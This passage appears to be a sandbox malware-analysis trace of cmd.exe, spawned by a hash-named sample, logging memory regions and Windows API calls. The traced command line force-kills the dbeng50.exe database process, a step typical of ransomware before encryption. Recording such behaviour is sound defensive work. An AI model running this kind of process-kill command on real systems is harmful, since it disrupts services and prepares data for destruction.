filename = "" Region: id = 3877 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3878 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3879 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3880 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 3881 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3882 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3883 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3884 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3885 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3886 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3887 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3888 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3889 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3890 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3891 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3892 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3893 start_va = 0x500000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3894 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3895 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3896 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3897 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3898 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3899 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3900 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3901 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3902 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3903 start_va = 0x7a0000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 3904 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3905 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3906 start_va = 0x850000 end_va = 0xb86fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 279 os_tid = 0x9a8 [0200.702] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0200.702] __set_app_type (_Type=0x1) [0200.702] __p__fmode () returned 0x74974d6c [0200.702] __p__commode () returned 0x74975b1c [0200.702] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0200.703] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0200.703] GetCurrentThreadId () returned 0x9a8 [0200.703] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a8) returned 0x78 [0200.703] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0200.703] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0200.703] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.711] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0200.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0200.711] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0200.711] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0200.711] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0200.711] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0200.712] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0200.712] GetConsoleOutputCP () returned 0x1b5 [0200.713] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0200.713] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0200.713] _get_osfhandle (_FileHandle=1) returned 0x13c [0200.713] SetConsoleMode (hConsoleHandle=0x13c, dwMode=0x0) returned 0 [0200.713] _get_osfhandle (_FileHandle=1) returned 0x13c [0200.713] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0200.713] _get_osfhandle (_FileHandle=0) returned 0x130 [0200.713] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0200.713] GetEnvironmentStringsW () returned 0x6a7fe8* [0200.713] GetProcessHeap () returned 0x6a0000 [0200.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xa1a) returned 0x6a8a10 [0200.714] FreeEnvironmentStringsA (penv="A") returned 1 [0200.714] GetProcessHeap () returned 0x6a0000 [0200.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x4) returned 0x6a7e68 [0200.714] GetEnvironmentStringsW () returned 0x6a7fe8* [0200.714] GetProcessHeap () returned 0x6a0000 [0200.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xa1a) returned 0x6a9438 [0200.714] FreeEnvironmentStringsA (penv="A") returned 1 [0200.714] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0200.714] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0200.714] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0200.714] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0200.714] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0200.714] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0200.714] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0200.714] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0200.714] RegCloseKey (hKey=0x88) returned 0x0 [0200.715] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0200.715] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0200.715] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0200.715] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0200.715] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0200.715] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0200.715] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0200.715] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0200.715] RegCloseKey (hKey=0x88) returned 0x0 [0200.715] time (in: timer=0x0 | out: timer=0x0) returned 0x62344237 [0200.715] srand (_Seed=0x62344237) [0200.715] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im dbeng50.exe \"" [0200.715] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im dbeng50.exe \"" [0200.715] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0200.715] GetProcessHeap () returned 0x6a0000 [0200.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x210) returned 0x6a6f98 [0200.716] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6a6fa0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0200.716] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0200.716] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0200.716] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0200.716] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0200.716] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0200.716] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0200.716] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0200.716] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0200.716] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0200.716] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0200.716] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0200.716] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0200.717] GetProcessHeap () returned 0x6a0000 [0200.717] RtlFreeHeap (HeapHandle=0x6a0000, Flags=0x0, BaseAddress=0x6a8a10) returned 1 [0200.717] GetEnvironmentStringsW () returned 0x6a7fe8* [0200.717] GetProcessHeap () returned 0x6a0000 [0200.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xa32) returned 0x6aa8a0 [0200.718] FreeEnvironmentStringsA (penv="A") returned 1 [0200.718] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0200.718] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0200.718] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0200.718] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0200.718] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0200.718] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0200.718] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0200.718] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0200.718] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0200.718] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0200.718] GetProcessHeap () returned 0x6a0000 [0200.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x44) returned 0x6a71b0 [0200.718] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0200.718] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0200.718] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0200.719] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6a7200 [0200.719] FindClose (in: hFindFile=0x6a7200 | out: hFindFile=0x6a7200) returned 1 [0200.719] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x6a7200 [0200.720] FindClose (in: hFindFile=0x6a7200 | out: hFindFile=0x6a7200) returned 1 [0200.720] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0200.720] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6a7200 [0200.720] FindClose (in: hFindFile=0x6a7200 | out: hFindFile=0x6a7200) returned 1 [0200.720] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0200.720] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0200.720] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0200.721] GetProcessHeap () returned 0x6a0000 [0200.721] RtlFreeHeap (HeapHandle=0x6a0000, Flags=0x0, BaseAddress=0x6aa8a0) returned 1 [0200.721] GetEnvironmentStringsW () returned 0x6a7fe8* [0200.721] GetProcessHeap () returned 0x6a0000 [0200.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xa76) returned 0x6a9e60 [0200.721] FreeEnvironmentStringsA (penv="=") returned 1 [0200.721] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0200.722] GetProcessHeap () returned 0x6a0000 [0200.722] RtlFreeHeap (HeapHandle=0x6a0000, Flags=0x0, BaseAddress=0x6a71b0) returned 1 [0200.722] GetProcessHeap () returned 0x6a0000 [0200.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x400e) returned 0x6abd60 [0200.723] GetProcessHeap () returned 0x6a0000 [0200.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x4a) returned 0x6a71b0 [0200.723] GetProcessHeap () returned 0x6a0000 [0200.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x4008) returned 0x6afd78 [0200.724] GetProcessHeap () returned 0x6a0000 [0200.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x4008) returned 0x6b3d88 [0200.725] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0200.726] GetProcessHeap () returned 0x6a0000 [0200.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x418) returned 0x6aa8e0 [0200.726] SetErrorMode (uMode=0x0) returned 0x8003 [0200.726] SetErrorMode (uMode=0x1) returned 0x0 [0200.726] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x6aa8e8, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0200.726] SetErrorMode (uMode=0x8003) returned 0x1 [0200.726] GetProcessHeap () returned 0x6a0000 [0200.726] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6aa8e0, Size=0x7c) returned 0x6aa8e0 [0200.726] GetProcessHeap () returned 0x6a0000 [0200.726] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6aa8e0) returned 0x7c [0200.726] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0200.726] GetProcessHeap () returned 0x6a0000 [0200.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x62) returned 0x6a7208 [0200.726] GetProcessHeap () returned 0x6a0000 [0200.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xb8) returned 0x6aa968 [0200.727] GetProcessHeap () returned 0x6a0000 [0200.727] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6aa968, Size=0x62) returned 0x6aa968 [0200.727] GetProcessHeap () returned 0x6a0000 [0200.727] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6aa968) returned 0x62 [0200.727] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0200.727] GetProcessHeap () returned 0x6a0000 [0200.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xe0) returned 0x6aa9d8 [0200.732] GetProcessHeap () returned 0x6a0000 [0200.732] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6aa9d8, Size=0x76) returned 0x6aa9d8 [0200.732] GetProcessHeap () returned 0x6a0000 [0200.732] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6aa9d8) returned 0x76 [0200.732] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.732] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im dbeng50.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0200.733] GetLastError () returned 0x3 [0200.733] GetProcessHeap () returned 0x6a0000 [0200.733] RtlFreeHeap (HeapHandle=0x6a0000, Flags=0x0, BaseAddress=0x6afd78) returned 1 [0200.733] GetProcessHeap () returned 0x6a0000 [0200.734] RtlFreeHeap (HeapHandle=0x6a0000, Flags=0x0, BaseAddress=0x6b3d88) returned 1 [0200.734] GetProcessHeap () returned 0x6a0000 [0200.734] RtlFreeHeap (HeapHandle=0x6a0000, Flags=0x0, BaseAddress=0x6abd60) returned 1 [0200.734] GetConsoleOutputCP () returned 0x1b5 [0200.735] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0200.735] GetUserDefaultLCID () returned 0x409 [0200.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0200.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0200.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0200.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0200.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0200.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0200.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0200.737] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0200.737] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0200.737] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0200.737] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0200.737] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0200.737] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0200.737] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0200.737] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0200.739] GetProcessHeap () returned 0x6a0000 [0200.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20c) returned 0x6aaaa0 [0200.739] GetConsoleTitleW (in: lpConsoleTitle=0x6aaaa0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0200.752] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0200.753] GetProcAddress (hModule=0x75600000, 